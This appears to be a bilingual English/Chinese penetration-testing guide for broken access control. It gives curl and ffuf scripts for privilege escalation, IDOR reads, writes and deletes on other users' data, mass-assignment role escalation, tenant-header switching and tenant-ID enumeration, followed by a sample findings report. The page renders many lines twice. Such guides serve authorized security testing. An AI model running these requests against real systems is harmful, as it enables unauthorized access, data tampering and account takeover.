Back to Details

testing-for-broken-access-control

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

Testing for Broken Access Control

测试访问控制漏洞

When to Use

适用场景

  • During authorized penetration tests as the primary assessment for OWASP A01:2021 - Broken Access Control
  • When evaluating role-based access control (RBAC) implementations across all application endpoints
  • For testing multi-tenant applications where users in one organization should not access another's data
  • When assessing API endpoints for missing or inconsistent authorization checks
  • During security audits where privilege escalation and unauthorized access are primary concerns
  • 在授权渗透测试中,作为OWASP A01:2021 - 访问控制漏洞的主要评估内容
  • 评估所有应用程序端点基于角色的访问控制(RBAC)实现情况
  • 测试多租户应用程序,确保一个组织的用户无法访问其他组织的数据
  • 评估API端点是否存在缺失或不一致的授权检查
  • 在以权限提升和未授权访问为主要关注点的安全审计中

Prerequisites

前提条件

  • Authorization: Written penetration testing agreement for the target
  • Burp Suite Professional: With Authorize extension for automated access control testing
  • Multiple test accounts: Accounts at each role level (admin, manager, user, guest)
  • Application role matrix: Documentation of what each role should and should not access
  • curl/httpie: For manual endpoint testing with different authentication contexts
  • ffuf: For discovering hidden endpoints that may lack access controls
  • 授权许可:针对目标系统的书面渗透测试协议
  • Burp Suite Professional:安装有Authorize扩展,用于自动化访问控制测试
  • 多个测试账号:涵盖每个角色级别(管理员、经理、普通用户、访客)
  • 应用角色矩阵:记录每个角色可访问和不可访问内容的文档
  • curl/httpie:用于在不同认证上下文下手动测试端点
  • ffuf:用于发现可能缺少访问控制的隐藏端点

Workflow

测试流程

Step 1: Map All Endpoints and Create Access Control Matrix

步骤1:映射所有端点并创建访问控制矩阵

Document every endpoint and the expected access level for each role.
bash
undefined
记录每个端点以及各角色的预期访问级别。
bash
undefined

Extract all endpoints from Burp Site Map

Extract all endpoints from Burp Site Map

Target > Site Map > Right-click > Copy URLs in this host

Target > Site Map > Right-click > Copy URLs in this host

Build a matrix of endpoints vs roles:

Build a matrix of endpoints vs roles:

| Endpoint | Admin | Manager | User | Guest |

| Endpoint | Admin | Manager | User | Guest |

|-----------------------|-------|---------|------|-------|

|-----------------------|-------|---------|------|-------|

| GET /admin/dashboard | Allow | Deny | Deny | Deny |

| GET /admin/dashboard | Allow | Deny | Deny | Deny |

| GET /api/users | Allow | Allow | Deny | Deny |

| GET /api/users | Allow | Allow | Deny | Deny |

| PUT /api/users/{id} | Allow | Deny | Own | Deny |

| PUT /api/users/{id} | Allow | Deny | Own | Deny |

| DELETE /api/posts/{id} | Allow | Allow | Own | Deny |

| DELETE /api/posts/{id} | Allow | Allow | Own | Deny |

Discover hidden endpoints

Discover hidden endpoints

ffuf -u "https://target.example.com/FUZZ"
-w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
-mc 200,301,302,403 -fc 404
-H "Authorization: Bearer $USER_TOKEN"
-o endpoints.json -of json
ffuf -u "https://target.example.com/FUZZ"
-w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
-mc 200,301,302,403 -fc 404
-H "Authorization: Bearer $USER_TOKEN"
-o endpoints.json -of json

API endpoint discovery

API endpoint discovery

ffuf -u "https://target.example.com/api/v1/FUZZ"
-w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt
-mc 200,201,204,301,302,401,403,405 -fc 404
-H "Authorization: Bearer $USER_TOKEN"
undefined
ffuf -u "https://target.example.com/api/v1/FUZZ"
-w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt
-mc 200,201,204,301,302,401,403,405 -fc 404
-H "Authorization: $USER_TOKEN"
undefined

Step 2: Configure Automated Access Control Testing

步骤2:配置自动化访问控制测试

Set up Burp Authorize extension for parallel role-based testing.
undefined
设置Burp Authorize扩展,进行基于角色的并行测试。
undefined

Install Authorize extension:

Install Authorize extension:

Burp > Extender > BApp Store > Search "Authorize" > Install

Burp > Extender > BApp Store > Search "Authorize" > Install

Configuration for three-tier testing:

Configuration for three-tier testing:

1. Browse the application as Admin (capture all requests)

1. Browse the application as Admin (capture all requests)

2. In Authorize tab:

2. In Authorize tab:

a. Add Regular User's session token in "Replace cookies/headers"

a. Add Regular User's session token in "Replace cookies/headers"

b. Optionally add a second row for Unauthenticated (no auth header)

b. Optionally add a second row for Unauthenticated (no auth header)

Example header replacement setup:

Example header replacement setup:

Row 1 (Low-privilege user):

Row 1 (Low-privilege user):

Cookie: session=low_priv_user_session

Cookie: session=low_priv_user_session

Authorization: Bearer low_priv_token

Authorization: Bearer low_priv_token

Row 2 (Unauthenticated):

Row 2 (Unauthenticated):

[Empty - removes all auth headers]

[Empty - removes all auth headers]

Enable interception in Authorize:

Enable interception in Authorize:

- Check "Intercept requests from Proxy"

- Check "Intercept requests from Proxy"

- Check "Intercept requests from Repeater"

- Check "Intercept requests from Repeater"

Authorize shows results as:

Authorize shows results as:

Green = Properly restricted (different response for different user)

Green = Properly restricted (different response for different user)

Red = POTENTIALLY VULNERABLE (same response regardless of role)

Red = POTENTIALLY VULNERABLE (same response regardless of role)

Orange = Uncertain (needs manual verification)

Orange = Uncertain (needs manual verification)

undefined
undefined

Step 3: Test Vertical Privilege Escalation

步骤3:测试纵向权限提升

Attempt to access higher-privilege functionality with lower-privilege accounts.
bash
undefined
尝试使用低权限账户访问高权限功能。
bash
undefined

Collect tokens for each role

Collect tokens for each role

ADMIN_TOKEN="Bearer admin_jwt_here" MANAGER_TOKEN="Bearer manager_jwt_here" USER_TOKEN="Bearer user_jwt_here"
ADMIN_TOKEN="Bearer admin_jwt_here" MANAGER_TOKEN="Bearer manager_jwt_here" USER_TOKEN="Bearer user_jwt_here"

Test admin endpoints with user token

Test admin endpoints with user token

ADMIN_ENDPOINTS=( "GET /admin/dashboard" "GET /admin/users" "POST /admin/users/create" "PUT /admin/settings" "DELETE /admin/users/5" "GET /admin/logs" "GET /admin/reports/export" "POST /admin/backup" )
for entry in "${ADMIN_ENDPOINTS[@]}"; do method=$(echo "$entry" | cut -d' ' -f1) endpoint=$(echo "$entry" | cut -d' ' -f2) echo -n "$method $endpoint (as user): " status=$(curl -s -o /dev/null -w "%{http_code}"
-X "$method"
-H "Authorization: $USER_TOKEN"
-H "Content-Type: application/json"
"https://target.example.com$endpoint") if [ "$status" == "200" ] || [ "$status" == "201" ]; then echo "VULNERABLE ($status)" else echo "OK ($status)" fi done
ADMIN_ENDPOINTS=( "GET /admin/dashboard" "GET /admin/users" "POST /admin/users/create" "PUT /admin/settings" "DELETE /admin/users/5" "GET /admin/logs" "GET /admin/reports/export" "POST /admin/backup" )
for entry in "${ADMIN_ENDPOINTS[@]}"; do method=$(echo "$entry" | cut -d' ' -f1) endpoint=$(echo "$entry" | cut -d' ' -f2) echo -n "$method $endpoint (as user): " status=$(curl -s -o /dev/null -w "%{http_code}"
-X "$method"
-H "Authorization: $USER_TOKEN"
-H "Content-Type: application/json"
"https://target.example.com$endpoint") if [ "$status" == "200" ] || [ "$status" == "201" ]; then echo "VULNERABLE ($status)" else echo "OK ($status)" fi done

Test with method override headers

Test with method override headers

curl -s -o /dev/null -w "%{http_code}"
-X POST
-H "Authorization: $USER_TOKEN"
-H "X-HTTP-Method-Override: DELETE"
"https://target.example.com/admin/users/5"
curl -s -o /dev/null -w "%{http_code}"
-X POST
-H "Authorization: $USER_TOKEN"
-H "X-HTTP-Method-Override: DELETE"
"https://target.example.com/admin/users/5"

Test with different HTTP methods

Test with different HTTP methods

for method in GET POST PUT PATCH DELETE OPTIONS HEAD; do echo -n "$method /admin/users: " curl -s -o /dev/null -w "%{http_code}"
-X "$method"
-H "Authorization: $USER_TOKEN"
"https://target.example.com/admin/users" echo done
undefined
for method in GET POST PUT PATCH DELETE OPTIONS HEAD; do echo -n "$method /admin/users: " curl -s -o /dev/null -w "%{http_code}"
-X "$method"
-H "Authorization: $USER_TOKEN"
"https://target.example.com/admin/users" echo done
undefined

Step 4: Test Horizontal Privilege Escalation

步骤4:测试横向权限提升

Verify that users cannot access resources belonging to other users at the same privilege level.
bash
undefined
验证用户是否无法访问同一权限级别下其他用户的资源。
bash
undefined

User A (ID: 101) testing access to User B's (ID: 102) resources

User A (ID: 101) testing access to User B's (ID: 102) resources

USER_A_TOKEN="Bearer user_a_jwt"
RESOURCES=( "/api/users/102/profile" "/api/users/102/orders" "/api/users/102/messages" "/api/users/102/documents" "/api/users/102/settings" "/api/users/102/payment-methods" )
for resource in "${RESOURCES[@]}"; do echo -n "GET $resource: " response=$(curl -s -w "\n%{http_code}"
-H "Authorization: $USER_A_TOKEN"
"https://target.example.com$resource") status=$(echo "$response" | tail -1) body_len=$(echo "$response" | head -n -1 | wc -c) if [ "$status" == "200" ] && [ "$body_len" -gt 50 ]; then echo "VULNERABLE ($status, $body_len bytes)" else echo "OK ($status)" fi done
USER_A_TOKEN="Bearer user_a_jwt"
RESOURCES=( "/api/users/102/profile" "/api/users/102/orders" "/api/users/102/messages" "/api/users/102/documents" "/api/users/102/settings" "/api/users/102/payment-methods" )
for resource in "${RESOURCES[@]}"; do echo -n "GET $resource: " response=$(curl -s -w "\n%{http_code}"
-H "Authorization: $USER_A_TOKEN"
"https://target.example.com$resource") status=$(echo "$response" | tail -1) body_len=$(echo "$response" | head -n -1 | wc -c) if [ "$status" == "200" ] && [ "$body_len" -gt 50 ]; then echo "VULNERABLE ($status, $body_len bytes)" else echo "OK ($status)" fi done

Test write operations across users

Test write operations across users

curl -s -X PUT
-H "Authorization: $USER_A_TOKEN"
-H "Content-Type: application/json"
-d '{"name":"Hacked","email":"hacked@evil.com"}'
"https://target.example.com/api/users/102/profile" -w "%{http_code}"
curl -s -X PUT
-H "Authorization: $USER_A_TOKEN"
-H "Content-Type: application/json"
-d '{"name":"Hacked","email":"hacked@evil.com"}'
"https://target.example.com/api/users/102/profile" -w "%{http_code}"

Test delete operations

Test delete operations

curl -s -X DELETE
-H "Authorization: $USER_A_TOKEN"
"https://target.example.com/api/users/102/documents/1" -w "%{http_code}"
undefined
curl -s -X DELETE
-H "Authorization: $USER_A_TOKEN"
"https://target.example.com/api/users/102/documents/1" -w "%{http_code}"
undefined

Step 5: Test Function-Level Access Control

步骤5:测试函数级访问控制

Verify that specific functions enforce authorization properly.
bash
undefined
验证特定功能是否正确执行授权检查。
bash
undefined

Test unauthenticated access to protected endpoints

Test unauthenticated access to protected endpoints

PROTECTED_ENDPOINTS=( "/api/user/profile" "/api/transactions" "/api/settings" "/admin/dashboard" "/api/export/users" )
for endpoint in "${PROTECTED_ENDPOINTS[@]}"; do echo -n "No auth: GET $endpoint: " curl -s -o /dev/null -w "%{http_code}"
"https://target.example.com$endpoint" echo done
PROTECTED_ENDPOINTS=( "/api/user/profile" "/api/transactions" "/api/settings" "/admin/dashboard" "/api/export/users" )
for endpoint in "${PROTECTED_ENDPOINTS[@]}"; do echo -n "No auth: GET $endpoint: " curl -s -o /dev/null -w "%{http_code}"
"https://target.example.com$endpoint" echo done

Test with expired/invalid tokens

Test with expired/invalid tokens

curl -s -o /dev/null -w "%{http_code}"
-H "Authorization: Bearer invalid_token_here"
"https://target.example.com/api/user/profile"
curl -s -o /dev/null -w "%{http_code}"
-H "Authorization: Bearer invalid_token_here"
"https://target.example.com/api/user/profile"

Test role manipulation in JWT claims

Test role manipulation in JWT claims

If JWT contains role claim, try modifying it

If JWT contains role claim, try modifying it

(requires JWT vulnerability - see JWT testing skill)

(requires JWT vulnerability - see JWT testing skill)

Test parameter-based role escalation

Test parameter-based role escalation

curl -s -X PUT
-H "Authorization: $USER_TOKEN"
-H "Content-Type: application/json"
-d '{"role":"admin","is_admin":true,"permissions":["admin","superuser"]}'
"https://target.example.com/api/users/101/profile"
curl -s -X PUT
-H "Authorization: $USER_TOKEN"
-H "Content-Type: application/json"
-d '{"role":"admin","is_admin":true,"permissions":["admin","superuser"]}'
"https://target.example.com/api/users/101/profile"

Test registration with elevated role

Test registration with elevated role

curl -s -X POST
-H "Content-Type: application/json"
-d '{"email":"new@test.com","password":"Test123!","role":"admin"}'
"https://target.example.com/api/auth/register"
undefined
curl -s -X POST
-H "Content-Type: application/json"
-d '{"email":"new@test.com","password":"Test123!","role":"admin"}'
"https://target.example.com/api/auth/register"
undefined

Step 6: Test Multi-Tenant Isolation

步骤6:测试多租户隔离

Verify that tenant boundaries are enforced in multi-tenant applications.
bash
undefined
验证多租户应用程序中租户边界是否得到有效执行。
bash
undefined

User in Tenant A testing access to Tenant B's resources

User in Tenant A testing access to Tenant B's resources

TENANT_A_TOKEN="Bearer tenant_a_user_jwt"
TENANT_A_TOKEN="Bearer tenant_a_user_jwt"

Direct tenant resource access

Direct tenant resource access

curl -s -H "Authorization: $TENANT_A_TOKEN"
"https://target.example.com/api/organizations/tenant-b-id/users" | jq .
curl -s -H "Authorization: $TENANT_A_TOKEN"
"https://target.example.com/api/organizations/tenant-b-id/settings" | jq .
curl -s -H "Authorization: $TENANT_A_TOKEN"
"https://target.example.com/api/organizations/tenant-b-id/users" | jq .
curl -s -H "Authorization: $TENANT_A_TOKEN"
"https://target.example.com/api/organizations/tenant-b-id/settings" | jq .

Test tenant switching via header

Test tenant switching via header

curl -s -H "Authorization: $TENANT_A_TOKEN"
-H "X-Tenant-ID: tenant-b-id"
"https://target.example.com/api/users" | jq .
curl -s -H "Authorization: $TENANT_A_TOKEN"
-H "X-Tenant-ID: tenant-b-id"
"https://target.example.com/api/users" | jq .

Test tenant ID in request body

Test tenant ID in request body

curl -s -X POST
-H "Authorization: $TENANT_A_TOKEN"
-H "Content-Type: application/json"
-d '{"tenant_id":"tenant-b-id","query":"SELECT * FROM users"}'
"https://target.example.com/api/reports/custom"
curl -s -X POST
-H "Authorization: $TENANT_A_TOKEN"
-H "Content-Type: application/json"
-d '{"tenant_id":"tenant-b-id","query":"SELECT * FROM users"}'
"https://target.example.com/api/reports/custom"

Enumerate tenant IDs

Enumerate tenant IDs

ffuf -u "https://target.example.com/api/organizations/FUZZ"
-w <(seq 1 100)
-H "Authorization: $TENANT_A_TOKEN"
-mc 200 -t 10 -rate 20
undefined
ffuf -u "https://target.example.com/api/organizations/FUZZ"
-w <(seq 1 100)
-H "Authorization: $TENANT_A_TOKEN"
-mc 200 -t 10 -rate 20
undefined

Key Concepts

核心概念

ConceptDescription
Vertical Privilege EscalationLower-privilege user accessing higher-privilege functionality (user -> admin)
Horizontal Privilege EscalationUser accessing another user's resources at the same privilege level
Function-Level Access ControlAuthorization checks on specific features/functions regardless of URL
RBACRole-Based Access Control - permissions assigned to roles, roles assigned to users
ABACAttribute-Based Access Control - permissions based on user/resource/environment attributes
Multi-Tenant IsolationEnsuring data and functionality separation between different organizations/tenants
Insecure Direct Object ReferenceAccessing objects by manipulating identifiers without authorization checks
Missing Function-Level CheckEndpoint exists but does not verify the caller has permission to invoke it
概念描述
Vertical Privilege Escalation低权限用户访问高权限功能(普通用户→管理员)
Horizontal Privilege Escalation用户访问同一权限级别下其他用户的资源
Function-Level Access Control针对特定功能的授权检查,与URL无关
RBAC基于角色的访问控制 - 权限分配给角色,角色分配给用户
ABAC基于属性的访问控制 - 权限基于用户/资源/环境属性
Multi-Tenant Isolation确保不同组织/租户之间的数据和功能相互隔离
Insecure Direct Object Reference通过操纵标识符访问对象,未经过授权检查
Missing Function-Level Check端点存在但未验证调用者是否有权限执行该功能

Tools & Systems

工具与系统

ToolPurpose
Burp Suite ProfessionalRequest interception and role-based testing
Authorize (Burp Extension)Automated access control testing across sessions
AutoRepeater (Burp Extension)Automatically replays requests with different auth contexts
PostmanAPI testing with environment switching between roles
ffufDiscovering hidden endpoints that may lack access controls
OWASP ZAPAccess control testing with context-aware scanning
工具用途
Burp Suite Professional请求拦截和基于角色的测试
Authorize (Burp Extension)跨会话自动化访问控制测试
AutoRepeater (Burp Extension)使用不同认证上下文自动重放请求
Postman在不同角色环境下进行API测试
ffuf发现可能缺少访问控制的隐藏端点
OWASP ZAP上下文感知扫描的访问控制测试

Common Scenarios

常见场景

Scenario 1: Admin Panel Without Auth Check

场景1:未做权限检查的管理面板

The 
/admin/dashboard
endpoint returns the admin panel when accessed with a regular user's session token. The front-end hides the admin menu, but the back-end does not enforce role checks.
当使用普通用户的会话令牌访问
/admin/dashboard
端点时,返回管理面板内容。前端隐藏了管理菜单,但后端未执行角色检查。

Scenario 2: API Endpoint Missing Authorization

场景2:缺少授权的API端点

The 
DELETE /api/users/{id}
endpoint checks for authentication (valid token) but not authorization (admin role). Any authenticated user can delete any other user's account.
DELETE /api/users/{id}
端点仅检查认证(有效令牌),但未检查授权(管理员角色)。任何已认证用户都可以删除其他用户的账户。

Scenario 3: Tenant Data Leakage

场景3:租户数据泄露

A SaaS application uses 
tenant_id
in API request headers. Changing the 
X-Tenant-ID
header to another tenant's ID returns their data, bypassing tenant isolation.
某SaaS应用在API请求头中使用
tenant_id
。将
X-Tenant-ID
头修改为其他租户的ID即可返回该租户的数据,绕过了租户隔离机制。

Scenario 4: Mass Assignment Role Escalation

场景4:批量赋值导致的权限提升

The user profile update endpoint at 
PUT /api/users/{id}
accepts a 
role
field in the JSON body. Submitting 
"role":"admin"
alongside a profile update elevates the user to administrator.
用户资料更新端点
PUT /api/users/{id}
接受JSON体中的
role
字段。提交
"role":"admin"
并更新资料可将用户提升为管理员。

Output Format

输出格式

undefined
undefined

Broken Access Control Assessment Report

访问控制漏洞评估报告

Target: target.example.com Assessment Date: 2024-01-15 OWASP Category: A01:2021 - Broken Access Control
目标系统:target.example.com 评估日期:2024-01-15 OWASP分类:A01:2021 - 访问控制漏洞

Access Control Matrix Results

访问控制矩阵结果

EndpointAdminManagerUserGuestExpectedActual
GET /admin/dashboard200200200302Admin onlyFAIL
DELETE /api/users/{id}200200200401Admin onlyFAIL
GET /api/users/other/profile200200200401Own onlyFAIL
PUT /api/users/other/settings200200200401Own onlyFAIL
GET /api/org/other-tenant200200200401Same tenantFAIL
端点管理员经理普通用户访客预期权限实际结果
GET /admin/dashboard200200200302仅管理员可访问失败
DELETE /api/users/{id}200200200401仅管理员可访问失败
GET /api/users/other/profile200200200401仅所有者可访问失败
PUT /api/users/other/settings200200200401仅所有者可访问失败
GET /api/org/other-tenant200200200401仅同租户可访问失败

Critical Findings

关键发现

  1. Vertical Escalation: Regular users can access /admin/* endpoints
  2. Horizontal IDOR: Users can read/modify other users' profiles
  3. Tenant Isolation: Cross-tenant data access via header manipulation
  4. Mass Assignment: Role escalation via profile update endpoint
  1. 纵向越权:普通用户可访问/admin/*端点
  2. 横向IDOR:用户可读取/修改其他用户的资料
  3. 租户隔离失效:通过修改请求头实现跨租户数据访问
  4. 批量赋值漏洞:通过资料更新端点提升权限

Impact

影响

  • Complete administrative access for any authenticated user
  • Full user data access across all accounts (15,000+ users)
  • Cross-tenant data breach affecting 200+ organizations
  • Account takeover via profile modification
  • 任何已认证用户均可获得完整的管理员权限
  • 可访问所有用户的全部数据(15000+用户)
  • 跨租户数据泄露影响200+组织
  • 通过资料修改实现账户接管

Recommendation

建议

  1. Implement server-side authorization checks on every endpoint
  2. Use a centralized authorization middleware/framework
  3. Enforce object-level authorization (verify ownership before access)
  4. Validate tenant context server-side, never from client headers
  5. Use allowlists for mass assignment (only permit expected fields)
  6. Implement audit logging for all access control decisions
undefined
  1. 在每个端点上实现服务器端授权检查
  2. 使用集中式授权中间件/框架
  3. 实施对象级授权(访问前验证所有权)
  4. 在服务器端验证租户上下文,切勿信任客户端请求头
  5. 为批量赋值使用允许列表(仅接受预期字段)
  6. 为所有访问控制决策实现审计日志
undefined